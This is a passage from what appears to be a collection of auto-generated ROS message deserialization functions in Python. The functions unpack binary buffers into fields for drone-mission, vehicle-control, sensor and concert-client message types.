python3:\n val2.slot_name = str[start:end].decode('utf-8')\n else:\n val2.slot_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.receivers_name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.receivers_name.append(val3)\n val1.pre_actions.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.post_actions = []\n for i in range(0, length):\n val2 = flyaq.msg.Action()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 1\n (val2.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.action_name = str[start:end].decode('utf-8')\n else:\n val2.action_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.parameters = []\n for i in range(0, length):\n val3 = flyaq.msg.Parameter()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.parameters.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.slot_name = str[start:end].decode('utf-8')\n else:\n val2.slot_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.receivers_name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.receivers_name.append(val3)\n val1.post_actions.append(val2)\n start = end\n end += 4\n (val1.altitude,) = _struct_f.unpack(str[start:end])\n _v7 = val1.target_position\n _x = _v7\n start = end\n end += 16\n (_x.latitude, _x.longitude, _x.altitude, _x.heading,) = _struct_4f.unpack(str[start:end])\n start = end\n end += 1\n (val1.strategy,) = _struct_b.unpack(str[start:end])\n _v8 = val1.duration\n _x = _v8\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2i.unpack(str[start:end])\n _x = val1\n start = end\n end += 13\n (_x.radius, _x.circle_altitude, _x.clockwise, _x.direction,) = _struct_2fBf.unpack(str[start:end])\n val1.clockwise = bool(val1.clockwise)\n self.movements.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.move_transitions = []\n for i in range(0, length):\n val1 = flyaq.msg.MoveTransition()\n start = end\n end += 1\n (val1.is_choice,) = _struct_B.unpack(str[start:end])\n val1.is_choice = bool(val1.is_choice)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.wait_for_slot_name = str[start:end].decode('utf-8')\n else:\n val1.wait_for_slot_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n 
if python3:\n val1.from_move_name = str[start:end].decode('utf-8')\n else:\n val1.from_move_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.to_move_name = str[start:end].decode('utf-8')\n else:\n val1.to_move_name = str[start:end]\n start = end\n end += 1\n (val1.fluid,) = _struct_B.unpack(str[start:end])\n val1.fluid = bool(val1.fluid)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.condition_identifier = str[start:end].decode('utf-8')\n else:\n val1.condition_identifier = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.false_branch_move_name = str[start:end].decode('utf-8')\n else:\n val1.false_branch_move_name = str[start:end]\n self.move_transitions.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.slot_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.slot_names.append(val1)\n start = end\n end += 1\n (self.travel_mode,) = _struct_b.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 41\n (_x.enable_steering, _x.enable_braking, _x.enable_driving, _x.enable_Estop, _x.enable_gear, _x.sw_deg, _x.sw_rad, _x.speed_ms, _x.speed_kms, _x.ax_ms2, _x.omega_rad, _x.gear_mode, _x.steering, _x.speed,) = _get_struct_5B6fi2f().unpack(str[start:end])\n self.enable_steering = bool(self.enable_steering)\n self.enable_braking = bool(self.enable_braking)\n self.enable_driving = bool(self.enable_driving)\n self.enable_Estop = bool(self.enable_Estop)\n self.enable_gear = bool(self.enable_gear)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.sensor_pose_on_robot is None:\n self.sensor_pose_on_robot = geometry_msgs.msg.Pose()\n if self.sensed_data is None:\n self.sensed_data = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 96\n (_x.sensor_pose_on_robot.position.x, _x.sensor_pose_on_robot.position.y, _x.sensor_pose_on_robot.position.z, _x.sensor_pose_on_robot.orientation.x, _x.sensor_pose_on_robot.orientation.y, _x.sensor_pose_on_robot.orientation.z, _x.sensor_pose_on_robot.orientation.w, _x.min_sensor_distance, _x.max_sensor_distance, _x.sensor_std_range, _x.sensor_std_yaw, _x.sensor_std_pitch,) = _get_struct_12d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.sensed_data = []\n for i in range(0, length):\n val1 = mrpt_msgs.msg.SingleRangeBearingObservation()\n _x = val1\n start = end\n end += 28\n (_x.range, _x.yaw, _x.pitch, _x.id,) = 
_get_struct_3di().unpack(str[start:end])\n self.sensed_data.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.Front_sens is None:\n self.Front_sens = motor_sc.msg.sens9ax()\n if self.Rear_sens is None:\n self.Rear_sens = motor_sc.msg.sens9ax()\n end = 0\n _x = self\n start = end\n end += 9\n (_x.Front_sens.ID, _x.Front_sens.timestamp,) = _get_struct_BQ().unpack(str[start:end])\n start = end\n end += 24\n self.Front_sens.compass = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Front_sens.gyro = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Front_sens.accel = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Front_sens.fusionPose = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 32\n self.Front_sens.fusionQPose = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4)\n _x = self\n start = end\n end += 9\n (_x.Rear_sens.ID, _x.Rear_sens.timestamp,) = _get_struct_BQ().unpack(str[start:end])\n start = end\n end += 24\n self.Rear_sens.compass = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Rear_sens.gyro = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Rear_sens.accel = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 24\n self.Rear_sens.fusionPose = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n start = end\n end += 32\n self.Rear_sens.fusionQPose = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.cnt is None:\n self.cnt = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.cnt = []\n for i in range(0, length):\n val1 = dgvmsg.msg.Encounter()\n _v10 = val1.header\n start = end\n end += 4\n (_v10.seq,) = _get_struct_I().unpack(str[start:end])\n _v11 = _v10.stamp\n _x = _v11\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v10.frame_id = str[start:end].decode('utf-8')\n else:\n _v10.frame_id = str[start:end]\n start = end\n end += 4\n (val1.devadd,) = _get_struct_i().unpack(str[start:end])\n _v12 = val1.now\n _x = _v12\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (val1.encounter,) = _get_struct_I().unpack(str[start:end])\n self.cnt.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.group = str[start:end].decode('utf-8')\n else:\n self.group = str[start:end]\n _x = self\n start = end\n end += 2\n (_x.rand_start, _x.current_start,) = _get_struct_2B().unpack(str[start:end])\n self.rand_start = bool(self.rand_start)\n self.current_start = bool(self.current_start)\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.start_pos = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 1\n (self.rand_target,) = _get_struct_B().unpack(str[start:end])\n self.rand_target = bool(self.rand_target)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.target_pos = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n _x = self\n start = end\n end += 4\n (_x.execute, _x.wait, _x.ret_plan, _x.ret_fps,) = _get_struct_3Bb().unpack(str[start:end])\n self.execute = bool(self.execute)\n self.wait = bool(self.wait)\n self.ret_plan = bool(self.ret_plan)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.pending is None:\n self.pending = None\n if self.available is None:\n self.available = None\n if self.missing is None:\n self.missing = None\n if self.gone is None:\n self.gone = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.pending = []\n for i in range(0, length):\n val1 = concert_msgs.msg.ConcertClient()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.gateway_name = str[start:end].decode('utf-8')\n else:\n val1.gateway_name = str[start:end]\n _v49 = val1.platform_info\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v49.name = str[start:end].decode('utf-8')\n else:\n _v49.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v49.rocon_uri = str[start:end].decode('utf-8')\n else:\n _v49.rocon_uri = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v49.description = str[start:end].decode('utf-8')\n else:\n _v49.description = str[start:end]\n _v50 = _v49.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v50.resource_name = str[start:end].decode('utf-8')\n else:\n _v50.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v50.format = str[start:end].decode('utf-8')\n else:\n _v50.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v50.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v49.version = str[start:end].decode('utf-8')\n else:\n _v49.version = str[start:end]\n start = end\n end += 1\n (val1.is_local_client,) = _get_struct_B().unpack(str[start:end])\n val1.is_local_client = bool(val1.is_local_client)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.state = str[start:end].decode('utf-8')\n else:\n val1.state = str[start:end]\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.ip = str[start:end].decode('utf-8')\n else:\n val1.ip = str[start:end]\n _v51 = val1.conn_stats\n _x = _v51\n start = end\n end += 40\n (_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level,) = _get_struct_Bq4fBbfb2f().unpack(str[start:end])\n _v51.gateway_available = bool(_v51.gateway_available)\n _v51.network_info_available = bool(_v51.network_info_available)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.rapps = []\n for i in range(0, length):\n val2 = rocon_app_manager_msgs.msg.Rapp()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.display_name = str[start:end].decode('utf-8')\n else:\n val2.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.description = str[start:end].decode('utf-8')\n else:\n val2.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.compatibility = str[start:end].decode('utf-8')\n else:\n val2.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.status = str[start:end].decode('utf-8')\n else:\n val2.status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.implementations = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.implementations.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.preferred = str[start:end].decode('utf-8')\n else:\n val2.preferred = str[start:end]\n _v52 = val2.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v52.resource_name = str[start:end].decode('utf-8')\n else:\n _v52.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v52.format = str[start:end].decode('utf-8')\n else:\n _v52.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v52.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_interface = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = 
str[start:end]\n val2.public_interface.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_parameters = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_parameters.append(val3)\n val1.rapps.append(val2)\n self.pending.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.available = []\n for i in range(0, length):\n val1 = concert_msgs.msg.ConcertClient()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.gateway_name = str[start:end].decode('utf-8')\n else:\n val1.gateway_name = str[start:end]\n _v53 = val1.platform_info\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v53.name = str[start:end].decode('utf-8')\n else:\n _v53.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v53.rocon_uri = str[start:end].decode('utf-8')\n else:\n _v53.rocon_uri = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v53.description = str[start:end].decode('utf-8')\n else:\n _v53.description = str[start:end]\n _v54 = _v53.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v54.resource_name = str[start:end].decode('utf-8')\n else:\n _v54.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v54.format = str[start:end].decode('utf-8')\n else:\n _v54.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v54.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v53.version = str[start:end].decode('utf-8')\n else:\n _v53.version = str[start:end]\n start = end\n end += 1\n (val1.is_local_client,) = _get_struct_B().unpack(str[start:end])\n val1.is_local_client = bool(val1.is_local_client)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.state = str[start:end].decode('utf-8')\n else:\n val1.state = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.ip = str[start:end].decode('utf-8')\n else:\n val1.ip = str[start:end]\n _v55 = val1.conn_stats\n _x = _v55\n start = end\n end += 40\n (_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, 
_x.wireless_signal_level, _x.wireless_noise_level,) = _get_struct_Bq4fBbfb2f().unpack(str[start:end])\n _v55.gateway_available = bool(_v55.gateway_available)\n _v55.network_info_available = bool(_v55.network_info_available)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.rapps = []\n for i in range(0, length):\n val2 = rocon_app_manager_msgs.msg.Rapp()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.display_name = str[start:end].decode('utf-8')\n else:\n val2.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.description = str[start:end].decode('utf-8')\n else:\n val2.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.compatibility = str[start:end].decode('utf-8')\n else:\n val2.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.status = str[start:end].decode('utf-8')\n else:\n val2.status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.implementations = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.implementations.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.preferred = str[start:end].decode('utf-8')\n else:\n val2.preferred = str[start:end]\n _v56 = val2.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v56.resource_name = str[start:end].decode('utf-8')\n else:\n _v56.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v56.format = str[start:end].decode('utf-8')\n else:\n _v56.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v56.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_interface = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_interface.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_parameters = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n 
(length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_parameters.append(val3)\n val1.rapps.append(val2)\n self.available.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.missing = []\n for i in range(0, length):\n val1 = concert_msgs.msg.ConcertClient()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.gateway_name = str[start:end].decode('utf-8')\n else:\n val1.gateway_name = str[start:end]\n _v57 = val1.platform_info\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v57.name = str[start:end].decode('utf-8')\n else:\n _v57.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v57.rocon_uri = str[start:end].decode('utf-8')\n else:\n _v57.rocon_uri = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v57.description = str[start:end].decode('utf-8')\n else:\n _v57.description = str[start:end]\n _v58 = _v57.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v58.resource_name = str[start:end].decode('utf-8')\n else:\n _v58.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v58.format = str[start:end].decode('utf-8')\n else:\n _v58.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v58.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v57.version = str[start:end].decode('utf-8')\n else:\n _v57.version = str[start:end]\n start = end\n end += 1\n (val1.is_local_client,) = _get_struct_B().unpack(str[start:end])\n val1.is_local_client = bool(val1.is_local_client)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.state = str[start:end].decode('utf-8')\n else:\n val1.state = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.ip = str[start:end].decode('utf-8')\n else:\n val1.ip = str[start:end]\n _v59 = val1.conn_stats\n _x = _v59\n start = end\n end += 40\n (_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level,) = _get_struct_Bq4fBbfb2f().unpack(str[start:end])\n _v59.gateway_available = bool(_v59.gateway_available)\n _v59.network_info_available = bool(_v59.network_info_available)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.rapps = []\n for i in range(0, length):\n val2 = rocon_app_manager_msgs.msg.Rapp()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = 
end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.display_name = str[start:end].decode('utf-8')\n else:\n val2.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.description = str[start:end].decode('utf-8')\n else:\n val2.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.compatibility = str[start:end].decode('utf-8')\n else:\n val2.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.status = str[start:end].decode('utf-8')\n else:\n val2.status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.implementations = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.implementations.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.preferred = str[start:end].decode('utf-8')\n else:\n val2.preferred = str[start:end]\n _v60 = val2.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v60.resource_name = str[start:end].decode('utf-8')\n else:\n _v60.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v60.format = str[start:end].decode('utf-8')\n else:\n _v60.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v60.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_interface = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_interface.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_parameters = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_parameters.append(val3)\n val1.rapps.append(val2)\n self.missing.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.gone = []\n for i in range(0, length):\n val1 = concert_msgs.msg.ConcertClient()\n start = end\n end += 4\n (length,) = 
